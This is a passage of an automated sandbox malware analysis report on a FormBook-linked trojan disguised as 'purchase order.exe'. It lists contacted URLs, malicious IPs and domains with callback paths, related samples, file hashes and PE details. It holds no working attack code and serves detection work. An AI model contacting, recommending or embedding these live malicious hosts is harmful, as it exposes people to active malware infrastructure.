                                                            http://www.founder.com.cn/cn/cThepurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.galapagosdesign.com/staff/dennis.htmpurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.galapagosdesign.com/DPleasepurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.fonts.compurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.sandoll.co.krpurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.urwpp.deDPleasepurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.zhongyicts.com.cnpurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.sakkal.compurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.apache.org/licenses/LICENSE-2.0purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.fontbureau.compurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.gk88top.topolMGHvjsNFhNU.exe, 00000008.00000002.3517718165.0000000000FE5000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.ecosia.org/newtab/cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.carterandcone.comlpurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ac.ecosia.org/autocomplete?q=cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNpurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.founder.com.cn/cnpurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fontbureau.com/designers/frere-user.htmlpurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://codepen.io/uzcho_/pens/popular/?grid_type=listcacls.exe, 00000007.00000002.3518525848.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518272812.000000000380A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://codepen.io/uzcho_/pen/eYdmdXw.csscacls.exe, 00000007.00000002.3518525848.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518272812.000000000380A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://localhost/calculator_server/requests.phpcacls.exe, 00000007.00000002.3518525848.0000000003B3C000.00000004.10000000.00040000.00000000.sdmp, cacls.exe, 00000007.00000002.3517787544.0000000003196000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000000.2434717461.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2663319819.0000000023FAC000.00000004.80000000.00040000.00000000.sdmp, purchase order.exefalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.jiyu-kobo.co.jp/purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.fontbureau.com/designers8purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.aapanel.com/new/download.html?invite_code=aapanelecacls.exe, 00000007.00000002.3518525848.00000000046FE000.00000004.10000000.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518272812.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            13.248.169.48
                                                                                                            		www.aktmarket.xyzUnited States
                                                                                                            		16509AMAZON-02UStrue
                                                                                                            104.21.7.187
                                                                                                            		www.gk88top.topUnited States
                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                            84.32.84.32
                                                                                                            		techmiseajour.netLithuania
                                                                                                            		33922NTT-LT-ASLTtrue
                                                                                                            3.33.130.190
                                                                                                            		iglpg.onlineUnited States
                                                                                                            		8987AMAZONEXPANSIONGBtrue
                                                                                                            66.29.149.46
                                                                                                            		www.golivenow.liveUnited States
                                                                                                            		19538ADVANTAGECOMUStrue
                                                                                                            129.226.153.85
                                                                                                            		1hong.pels5zqo.shopSingapore
                                                                                                            		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                                            74.208.236.156
                                                                                                            		www.christinascuties.netUnited States
                                                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1569753
                                                                                                            Start date and time:2024-12-06 09:30:35 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 9m 30s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Run name:Run with higher sleep bypass
                                                                                                            Number of analysed new started processes analysed:9
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:2
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:purchase order.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@7/7
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 75%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 96%
                                                                                                            • Number of executed functions: 200
                                                                                                            • Number of non-executed functions: 303
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target olMGHvjsNFhNU.exe, PID 5332 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            No simulations

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            13.248.169.48SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.avalanchefi.xyz/vxa5/
                                                                                                            ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.remedies.pro/4azw/
                                                                                                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
                                                                                                            Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.smartgov.shop/1cwp/
                                                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.egyshare.xyz/440l/
                                                                                                            attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.aktmarket.xyz/wb7v/
                                                                                                            YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.tals.xyz/k1td/
                                                                                                            Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.optimismbank.xyz/98j3/
                                                                                                            lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.avalanchefi.xyz/ctta/
                                                                                                            BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.tals.xyz/k1td/
                                                                                                            104.21.7.187attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.gk88top.top/4gxa/
                                                                                                            84.32.84.32SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.appsolucao.shop/qize/
                                                                                                            Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.sido247.pro/073p/
                                                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.samundri.online/3ifu/
                                                                                                            attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.techmiseajour.net/jytl/
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • www.techmiseajour.net/jytl/
                                                                                                            DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • www.samundri.online/5kax/
                                                                                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.servehimfoundation.org/hsva/
                                                                                                            DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.alamboost.store/hugc/
                                                                                                            Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.pg874.shop/h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM
                                                                                                            fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.electronify.shop/0s9c/

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            www.aktmarket.xyzattached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 13.248.169.48
                                                                                                            Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            www.gk88top.topattached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.7.187
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 104.21.7.187
                                                                                                            1hong.pels5zqo.shopattached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 129.226.153.85
                                                                                                            PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                                                                            • 129.226.153.85
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 43.163.1.110
                                                                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                            • 43.163.1.110
                                                                                                            www.golivenow.liveattached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 66.29.149.46
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 66.29.149.46
                                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 66.29.149.46
                                                                                                            www.christinascuties.netattached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 74.208.236.156
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 74.208.236.156
                                                                                                            file.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 74.208.236.156

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            NTT-LT-ASLTOpportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msgGet hashmaliciousUnknownBrowse
                                                                                                            • 84.32.84.93
                                                                                                            iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                            • 84.32.84.100
                                                                                                            iGxCM2I5u9.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 84.32.84.122
                                                                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            http://editableslides.coGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                            • 84.32.84.208
                                                                                                            Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 84.32.53.129
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 84.32.84.32
                                                                                                            AMAZONEXPANSIONGBhttps://www.calameo.com/read/00783464726989e2a209aGet hashmaliciousUnknownBrowse
                                                                                                            • 3.33.220.150
                                                                                                            https://www.nomadaproducciones.com/hzGet hashmaliciousUnknownBrowse
                                                                                                            • 3.33.130.190
                                                                                                            MGQeZjDXc3.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 3.33.130.190
                                                                                                            https://ness.wiktripfitness.com/ghjki9l-8765t4/3/er4t5y6u7jyhtgrfefrgthyjuyhtgdsarfedwsqaGet hashmaliciousUnknownBrowse
                                                                                                            • 52.223.40.198
                                                                                                            s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 3.33.130.190
                                                                                                            QiGA4zxp7h.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 3.33.130.190
                                                                                                            https://tippfloorcovering-my.sharepoint.com/:f:/g/personal/inderjeet_tippfloor_com/EpEIzIGDzrlMs2z8rWgki5MBO5-d64iEaOqqeF3ulFqTiw?e=T39wglGet hashmaliciousUnknownBrowse
                                                                                                            • 52.223.52.2
                                                                                                            https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                                                                                                            • 52.223.40.198
                                                                                                            maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                                            • 3.33.130.190
                                                                                                            biosetGet hashmaliciousUnknownBrowse
                                                                                                            • 52.223.13.41
                                                                                                            AMAZON-02USmain_mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 13.218.109.96
                                                                                                            https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2Get hashmaliciousUnknownBrowse
                                                                                                            • 52.77.73.5
                                                                                                            main_arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 108.143.162.104
                                                                                                            main_mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 54.181.79.156
                                                                                                            main_sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 52.219.131.157
                                                                                                            https://do.not.click.on.this.link.instantrevert.net/XSEg2WDlKd2JCRDJOMWtwUGE5L0dpYzEyZUF0UjVQWmNQaWl2Q21KaDZSeUhuKzhLc243eHpPN1h4NjVNTnAzblZ6ZFZhaGwydDB1ZHJNUnQ5S25RRk0yTEtDbkhEZUlDZ29KY3lveXU2YW9kWkxheHEvTm1wWU5tWjUvT0lGZHkvR3k2MXBCbkYxdmJkZWl2NnNHa1dFcTFVd29uTklraVNkNHdISUFEbCszRE9tc3RETjdZSXdsaWl3PT0tLWJIaFJQTDlXUWhZQ0V6eWMtLWtnaFdmOHAzRW9zTE12VmNnY2lDS2c9PQ==?cid=2314349904Get hashmaliciousKnowBe4Browse
                                                                                                            • 13.227.8.37
                                                                                                            https://online.coverages.best/informations.html?via=PTonRVU7RklJK0ZJTzAmQVk9NllEODZFRTsmNVY4NzFPPEJZQztWVCA=Get hashmaliciousUnknownBrowse
                                                                                                            • 13.209.60.147
                                                                                                            bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 65.11.249.192
                                                                                                            https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6Get hashmaliciousUnknownBrowse
                                                                                                            • 3.5.133.203
                                                                                                            https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6Get hashmaliciousUnknownBrowse
                                                                                                            • 3.5.128.104
                                                                                                            CLOUDFLARENETUSpe61BNJmLf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.165.166
                                                                                                            https://l.user-edenred-meyclub.kadeos.com/rts/go2.aspx?h=3782162&tp=i-1NHD-99-2ZH4-1HXNG6-20-1PPCf-1c-11KR2-1HWQl1-lBCrdGKkeH-2H4ZZZ&pi=6DvBMG0gjxmwWZBUOtvVSRjwHoaoPzxcEck6D3-7U78&x=i-1NHD-99-2ZH4-1HXNG6-20-1PPCf-1c-11KR2-1HWQl1-lBCrdGKkeH-2H4ZZZ%7c612254%7c1175284778&hp2=b88d9aa5cea778a386a66e248545bc7b83591c6077edf33fe6b47536c9d63d12Get hashmaliciousUnknownBrowse
                                                                                                            • 104.18.16.32
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.165.166
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 172.67.74.152
                                                                                                            https://do.not.click.on.this.link.instantrevert.net/XSEg2WDlKd2JCRDJOMWtwUGE5L0dpYzEyZUF0UjVQWmNQaWl2Q21KaDZSeUhuKzhLc243eHpPN1h4NjVNTnAzblZ6ZFZhaGwydDB1ZHJNUnQ5S25RRk0yTEtDbkhEZUlDZ29KY3lveXU2YW9kWkxheHEvTm1wWU5tWjUvT0lGZHkvR3k2MXBCbkYxdmJkZWl2NnNHa1dFcTFVd29uTklraVNkNHdISUFEbCszRE9tc3RETjdZSXdsaWl3PT0tLWJIaFJQTDlXUWhZQ0V6eWMtLWtnaFdmOHAzRW9zTE12VmNnY2lDS2c9PQ==?cid=2314349904Get hashmaliciousKnowBe4Browse
                                                                                                            • 104.17.25.14
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.165.166
                                                                                                            BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                            • 104.21.67.152

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\purchase order.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\purchase order.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                            C:\Users\user\AppData\Local\Temp\t577G2K6

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\cacls.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.8022518515367825
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            File name:purchase order.exe
                                                                                                            File size:738'304 bytes
                                                                                                            MD5:79bfe4cd6855c69c57c3b6b3a2ad898f
                                                                                                            SHA1:f8e1d7de0aa66ac4a38d5b63d5e125d869ffe7a4
                                                                                                            SHA256:c8040b1741912e0e0ecf072a20889dea7c880b6dfa1d0d1579c996a99779ac1f
                                                                                                            SHA512:6a2698eec1eb1f35dc8686fd97cceb8cb90a41209625cee73bef420d9006139ea053df17af532773646e2f448437f330df0d5f5d44285838363aea426fa1dd36
                                                                                                            SSDEEP:12288:qPG+bXCyRhdsE2DqaE9g1YEsWzKPY0oPaGZNej8P/2okxa/Ot8Mf9juewH:2yyPsLDqaE9g1bjePY0oS5k2JxFy4U
                                                                                                            TLSH:9AF412696692D50ACA8127B41EB0F2BC77FC4E9EA901D3035FDDADEBBC3AD145C88141
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...abRg..............0..,...........J... ...`....@.. ....................................@................................

                                                                                                            File Icon

                                                                                                            Icon Hash:04852062591b5659

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4b4ab6
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67526261 [Fri Dec 6 02:33:05 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            push ebx
                                                                                                            add byte ptr [ecx+00h], bh
                                                                                                            jnc 00007F69D50A75C2h
                                                                                                            je 00007F69D50A75C2h
                                                                                                            add byte ptr [ebp+00h], ch
                                                                                                            add byte ptr [ecx+00h], al
                                                                                                            arpl word ptr [eax], ax
                                                                                                            je 00007F69D50A75C2h
                                                                                                            imul eax, dword ptr [eax], 00610076h
                                                                                                            je 00007F69D50A75C2h
                                                                                                            outsd
                                                                                                            add byte ptr [edx+00h], dh
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
